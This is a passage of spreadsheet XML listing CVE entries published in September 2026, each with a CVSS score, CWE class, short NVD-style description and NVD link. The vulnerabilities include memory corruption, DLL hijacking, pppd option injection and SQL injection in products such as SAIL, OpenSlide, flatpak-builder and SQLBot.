          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>For users authenticated through SAML or OpenID Connect (OIDC), this vulnerability can result in one user receiving another user's authenticated session when multiple SSO login attempts occur concurrently</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78428</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25282</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing unverified data from a neighboring system causes out of bound memory access.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25282</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-59607</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when copying large input data exceeds normal allocation limits.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-59607</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24073</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>Memory corruption when processing decode statistics due to insufficient validation of offset against structure size.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24073</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24074</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when processing data with large offset and length values exceeds buffer limits during data copy operations.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24074</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24075</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when multiple threads issue concurrent IOCTL requests to the device control handler due to improper synchronization and race conditions.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24075</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25278</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when processing I2C transfer requests due to a race condition between memory allocation and data copying.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25278</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25280</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>Memory corruption when processing escape handling flow with insufficient user buffer sizes.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25280</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25290</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when validating large data buffers from external sources using addition to check buffer length.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25290</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54692</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-131, CWE-787</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>SAIL is a cross-platform library for loading and saving images with support for animation, metadata, and ICC profiles. Prior to 1.0.0, sail_codec_load_frame_v8_xbm() in src/sail-codecs/xbm/xbm.c allocates the decoded pixel buffer using the X11 one-byte-per-literal layout, but an X10 static short file causes the flat decode loop to write two file-controlled bytes per literal. When ceil(width/8) produces an odd row stride, the X10 literal count includes a padding byte for every row, but the destination has no space for those bytes, so loading the XBM through sail_load_from_file, sail_load_from_memory, or sail_start_loading_* produces a forward heap overwrite that scales with image height. The X11 static char path is not affected. The overwrite can corrupt process state, cause reliable crashes, and potentially enable code execution in a susceptible consuming application. This issue is fixed in version 1.0.0.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54692</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81474</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Heap-based Buffer Overflow vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81474</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86320</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in flatpak-builder where Git hooks are not disabled when applying patch sources with use-git-am: true. An attacker who can provide a malicious source containing a Git post-applypatch hook can cause the hook to execute on the host during the build process, resulting in arbitrary code execution with the privileges of the user running flatpak-builder.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86320</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92838</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>0df08a0e-a200-4957-9bb0-084f562506f9</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>A DLL hijacking
vulnerability exists in the GeoVision GV-Remote E-Map desktop
application. The application loads one or more dynamic-link libraries (DLLs)
from an unsafe search path, allowing a local attacker to place a malicious DLL
in a location searched before the legitimate library location. If
successfully exploited, an attacker with local write access to the affected
directory could achieve arbitrary code execution in the security context of
the GV-Remote E-Map process.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92838</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93337</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>NetworkManager-l2tp contains an improper input validation vulnerability that allows local users with VPN connection creation permissions to inject arbitrary pppd directives by supplying mru or mtu property values containing trailing non-numeric content after a valid integer. Attackers can exploit the verbatim write of unvalidated strings into the pppd options file via write_config_option() to inject the plugin directive, causing the privileged pppd process to load an attacker-controlled shared object and achieve arbitrary code execution as root.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93337</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48977</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-123, CWE-1284, CWE-823</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>OpenSlide is a C library for reading whole slide image files. From 3.4.1 until 4.0.1, OpenSlide's parse_level0_xml() processing in src/openslide-vendor-ventana.c accepts nonpositive row or column tile counts from a crafted Ventana BIF file. The invalid counts produce attacker-controlled relative memory offsets and allow arbitrary values to be written at those offsets, affecting all supported platforms and configurations and resulting in a crash or potential arbitrary code execution. This issue is fixed in version 4.0.1.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48977</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50158</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>yutu is an AI-powered toolkit for managing and growing YouTube channels. Prior to 0.10.9, the caption-download MCP tool accepts a caller-controlled file parameter through cmd/caption/download.go and passes it to Caption.Download() in pkg/caption/caption.go, where os.Create() creates or truncates that path without using the pkg.Root confinement boundary backed by YUTU_ROOT. A principal able to invoke caption-download, including a local HTTP client when the MCP server runs with its default authentication-disabled configuration, can write downloaded caption bytes to any path writable by the yutu process outside YUTU_ROOT. This can overwrite application files, configuration, shell startup files, logs, or data and can cause persistent code execution or denial of service depending on the selected writable target. Live caption retrieval also requires usable service credentials and an accessible caption identifier. This issue is fixed in version 0.10.9.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50158</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53557</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, an authenticated user can supply a crafted sheet["tableName"] value in the Excel datasource configuration submitted through POST /api/v1/datasource/, and SQLBot stores that value without safe identifier handling. When the same datasource is later removed through DELETE /api/v1/datasource/{id}, the stored value is interpolated into datasource cleanup SQL and executed by PostgreSQL. This second-order SQL injection can invoke PostgreSQL COPY TO PROGRAM and execute arbitrary operating-system commands with the privileges of the postgres process inside the SQLBot container. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53557</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
